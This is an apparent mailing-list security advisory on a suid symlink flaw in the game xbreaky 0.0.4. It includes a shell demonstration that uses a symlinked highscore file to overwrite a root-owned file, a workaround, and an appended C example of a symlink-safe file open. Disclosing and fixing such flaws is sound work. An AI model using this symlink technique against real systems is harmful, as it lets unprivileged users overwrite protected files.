From: m.v.berkum at obit.nl (Marco van Berkum)
Subject: xbreaky symlink vulnerability

-----------------------------------------------------------------------
Title:             xbreaky 0.0.4 symlink vulnerability
Author:            Marco van Berkum
Classification:    High risk
Date:              10/09/2002
Email:             m.v.berkum@...t.nl
Company:           OBIT
Company site:      http://www.obit.nl
Personal website:  http://ws.obit.nl
-----------------------------------------------------------------------

About xbreaky
-------------
xbreaky is a breakout game for X written by Dave Brul, which can be downloaded
from http://xbreaky.sourceforge.net. xbreaky has been added to the OpenBSD ports
tree, the NetBSD tree and possibly others.

Problem
-------
By default xbreaky is installed suid, and any user can abuse it to overwrite any
file on the filesystem.

Exploit
-------
xbreaky writes its highscores to $HOME/.breakyhighscores. When
$HOME/.breakyhighscores is a symlink to another file (*any* file), xbreaky
simply overwrites that file as the root user.

Example
-------
root@...mal:/home/marco# echo "bla" >rootfile
root@...mal:/home/marco# chmod 600 rootfile
root@...mal:/home/marco# exit
logout
marco@...mal:~$ ln -s rootfile .breakyhighscores
marco@...mal:~$ xbreaky

Now I play a game and set highscore as user "lol", then I exit the game.
It's a nice game btw :)

marco@...mal:~$ cat rootfile
cat: rootfile: Permission denied
marco@...mal:~$ su -
Password:
root@...mal:~# cat /home/marco/rootfile
lol <- voila, our highscore user

Workaround
----------
Remove the suid bit.

Author
------
The author has been notified.

Credits
-------
Thanks to Dennis Oelkers for testing.

--
find / -user your -name base -exec chown us:us {}\;
 ----------------------------------------
|    Marco van Berkum / MB17300-RIPE     |
| m.v.berkum@...t.nl / http://ws.obit.nl |
 ----------------------------------------
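
For maintainers fixing this class of bug, the following is an added example (not part of the original post and not xbreaky's code) of how a suid program can open a per-user score file without following a symlink. The function name open_score_file and the demo paths are hypothetical; note that O_NOFOLLOW only guards the final path component, which is why the open is also done with the invoking user's uid.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: open a per-user score file from a suid program.
 * Returns a writable fd, or -1 if the path is unsafe or cannot be opened. */
int open_score_file(const char *path)
{
    uid_t ruid = getuid(), euid = geteuid();
    struct stat st;
    int fd;

    /* Access the file as the invoking user, not as the suid owner. */
    if (euid != ruid && seteuid(ruid) != 0)
        return -1;

    /* O_NOFOLLOW fails if the last component is a symlink. No O_TRUNC here:
     * the file is only truncated after the checks on the open fd pass. */
    fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW, 0600);
    if (fd >= 0 && (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
                    st.st_uid != ruid || st.st_nlink != 1)) {
        close(fd);              /* not a plain, singly linked, user-owned file */
        fd = -1;
    }
    if (fd >= 0 && ftruncate(fd, 0) != 0) { close(fd); fd = -1; }

    /* Regain the original effective uid for the rest of the program. */
    if (euid != ruid && seteuid(euid) != 0 && fd >= 0) { close(fd); fd = -1; }
    return fd;
}

int main(void)
{
    /* Constructed demo: a victim file and a symlink named like the score file. */
    char dir[] = "/tmp/xbreaky-demo-XXXXXX", victim[64], score[64];
    if (!mkdtemp(dir)) return 1;
    snprintf(victim, sizeof victim, "%s/rootfile", dir);
    snprintf(score, sizeof score, "%s/.breakyhighscores", dir);
    close(open(victim, O_WRONLY | O_CREAT, 0600));
    if (symlink(victim, score) != 0) return 1;
    printf("symlinked score file: %s\n",
           open_score_file(score) < 0 ? "refused" : "opened");
    return 0;
}
```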



